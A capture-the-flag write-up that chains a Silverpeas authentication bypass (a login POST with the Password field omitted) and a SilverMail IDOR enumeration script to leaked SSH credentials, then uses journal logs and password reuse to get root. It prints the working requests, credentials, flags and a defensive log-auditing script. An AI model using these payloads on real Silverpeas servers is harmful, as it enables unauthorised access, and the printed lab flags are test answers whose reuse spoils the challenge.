Overview
Chained two Silverpeas CVEs into SSH access, then pivoted through systemd journal logs to recover a reused database password for full root. CVE-2024-36042 bypasses authentication by omitting the Password field entirely, and CVE-2023-47323 is an IDOR that lets any authenticated user read arbitrary internal messages — including one containing SSH credentials left in a sticky note.
CVE-2024-36042: Auth bypass (omit Password field)
↓
CVE-2023-47323: IDOR on SilverMail → read Message ID 6
↓
SSH creds: tim:cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
↓
user flag: THM{c4ca4238a0b923820dcc509a6f75849b}
↓
adm group → journalctl → Docker DB_PASSWORD=_Zd_zx7N823/
↓
Credential reuse: SSH as tyler → sudo ALL
↓
root flag: THM{098f6bcd4621d373cade4e832627b4f6}
Port Scan & Web Enumeration
| Port | Service | Version | Notes |
|---|---|---|---|
| 22/tcp | SSH | OpenSSH 8.9p1 | Final access vector |
| 80/tcp | HTTP | nginx 1.18.0 | Static page, mentions scr1ptkiddy + Silverpeas |
| 8080/tcp | HTTP | Jetty 10.0.18 | Silverpeas 6.3.1 at /silverpeas/ |
Port 80 serves a static page for “Hack Smarter Security” referencing a project manager scr1ptkiddy reachable via an internal Silverpeas instance. Version confirmed via JS file suffixes: 6.3.1.
CVE-2024-36042 — Authentication Bypass
When the Password field is completely omitted (not empty — omitted) from the POST to /silverpeas/AuthenticationServlet, the server authenticates without credential validation:
```http
POST /silverpeas/AuthenticationServlet HTTP/1.1
Host: 10.112.164.140:8080
Content-Type: application/x-www-form-urlencoded

Login=SilverAdmin&DomainId=0
```
Note: there is no Password field at all. The response is a 302 redirect to MainFrame.jsp, i.e. the session is authenticated as SilverAdmin.
CVE-2023-47323 — IDOR on SilverMail
Any authenticated user can read arbitrary internal messages by enumerating the ID parameter — no authorization check:
```python
import requests

BASE = "http://10.112.164.140:8080/silverpeas"
session = requests.Session()  # session authenticated via the bypass above

for mid in range(1, 21):
    r = session.get(f"{BASE}/RSILVERMAIL/jsp/ReadMessage.jsp?ID={mid}")
    # Check r.text for credentials
```
Message ID 6 contains SSH credentials in plaintext:
```
From: Administrateur | Date: 13/12/2023
Dude how do you always forget the SSH password? Use a password manager and quit using your silly sticky notes.
Username: tim
Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
```
SSH as tim → User Flag
```
$ ssh tim@10.112.164.140
Password: cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
$ id
uid=1001(tim) gid=1001(tim) groups=1001(tim),4(adm)
$ cat ~/user.txt
THM{c4ca4238a0b923820dcc509a6f75849b}
```
adm Group → Journal Logs → Tyler’s Password
The adm group grants read access to systemd journal logs. Tyler’s Docker run command is logged with the database password in cleartext:
```
$ journalctl _UID=1000 --no-pager | grep DB_PASSWORD
Dec 13 15:45:57 silver-platter sudo[2616]: tyler : TTY=tty1 ; PWD=/ ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=_Zd_zx7N823/ silverpeas:6.3.1
```
Credential reuse: _Zd_zx7N823/ is also tyler’s system password.
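As an added defensive example (not part of the original writeup or of the Silverpeas project), the following script audits sudo COMMAND= journal entries for secret-looking arguments such as the DB_PASSWORD above and reports them with the value redacted, which is the check a blue team would run before widening adm membership. The journal lines it scans are constructed samples modelled on the entry shown above; the key names and values are placeholders.

```python
import re

# Constructed sample journal lines (placeholder secrets), modelled on the
# "sudo ... COMMAND=/usr/bin/docker run ... -e DB_PASSWORD=..." entry above.
SAMPLE_JOURNAL = """\
Dec 13 15:45:57 host sudo[2616]: tyler : TTY=tty1 ; PWD=/ ; COMMAND=/usr/bin/docker run --name silverpeas -p 8080:8000 -d -e DB_NAME=Silverpeas -e DB_USER=silverpeas -e DB_PASSWORD=ExampleDbPass1 silverpeas:6.3.1
Dec 13 15:46:10 host sudo[2630]: tyler : TTY=tty1 ; PWD=/ ; COMMAND=/usr/bin/docker ps
Dec 13 15:47:02 host sudo[2641]: tyler : TTY=tty1 ; PWD=/ ; COMMAND=/usr/bin/mysql -u app --password=ExampleSqlPass2 appdb
"""

# sudo's standard log line: "<user> : TTY=... ; PWD=... ; COMMAND=<cmd>"
SUDO_CMD = re.compile(r"sudo\[\d+\]: (?P<user>\S+) : .*?COMMAND=(?P<cmd>.*)$")

# KEY=value arguments whose key mentions a password/secret/token/key,
# plus --password=value style flags.
SECRET_ARG = re.compile(
    r"(?P<key>(?:[A-Z_]*(?:PASS(?:WORD)?|SECRET|TOKEN|KEY)[A-Z_]*)|--password)"
    r"=(?P<val>\S+)",
    re.IGNORECASE,
)


def find_leaked_secrets(journal_text):
    """Return (user, [keys], redacted_command) for each sudo COMMAND=
    line that carries a secret-looking argument."""
    findings = []
    for line in journal_text.splitlines():
        m = SUDO_CMD.search(line)
        if not m:
            continue
        cmd = m.group("cmd")
        keys = [s.group("key") for s in SECRET_ARG.finditer(cmd)]
        if keys:
            # Never re-log the secret itself; keep only the key name.
            redacted = SECRET_ARG.sub(lambda s: f"{s.group('key')}=<REDACTED>", cmd)
            findings.append((m.group("user"), keys, redacted))
    return findings


if __name__ == "__main__":
    for user, keys, cmd in find_leaked_secrets(SAMPLE_JOURNAL):
        print(f"[!] {user} passed {', '.join(keys)} on the command line: {cmd}")
```

On a live host the same function can be fed the output of `journalctl --no-pager -o cat` to find secrets that are already sitting in the journal, which is the artifact that ships with the box regardless of how the container was later reconfigured.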
SSH as tyler → sudo → Root Flag
```
$ ssh tyler@10.112.164.140
Password: _Zd_zx7N823/
$ id
uid=1000(tyler) gid=1000(tyler) groups=1000(tyler),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd)
$ sudo cat /root/root.txt
THM{098f6bcd4621d373cade4e832627b4f6}
```
Attack Chain
tim:cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol → journalctl → DB_PASSWORD → SSH as tyler → sudo cat /root/root.txt → Root: THM{098f6bcd4621d373cade4e832627b4f6}
Vulnerabilities
| Finding | CVE | Severity | Impact |
|---|---|---|---|
| Silverpeas authentication bypass | CVE-2024-36042 | Critical | Login as any user without credentials |
| SilverMail IDOR | CVE-2023-47323 | Critical | Read arbitrary internal messages |
| Credential reuse (DB → SSH) | — | High | Database password reused as system account password |
| Secrets in Docker CLI arguments | — | High | DB_PASSWORD visible in journal logs permanently |
| Excessive adm group membership | — | Medium | tim can read all system logs including tyler’s commands |
Takeaways
ps, /proc/*/cmdline, and system logs permanently. Use Docker secrets, env files, or vaults.
Full Exploit Script
```
$ python3 silver_platter_auto.py
[+] Auth bypass successful — logged in as SilverAdmin
[+] Credentials found: tim:cm0nt!md0ntf0rg3tth!spa$$w0rdagainlol
[+] USER FLAG: THM{c4ca4238a0b923820dcc509a6f75849b}
[+] Found credential in docker run: DB_PASSWORD=_Zd_zx7N823/
[+] ROOT FLAG: THM{098f6bcd4621d373cade4e832627b4f6}
```
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port scanning and service enumeration |
| python3 + requests | Auth bypass + IDOR enumeration |
| python3 + paramiko | SSH access and command execution |
| journalctl | Systemd journal log analysis |
| silver_platter_auto.py | Full automated exploit chain |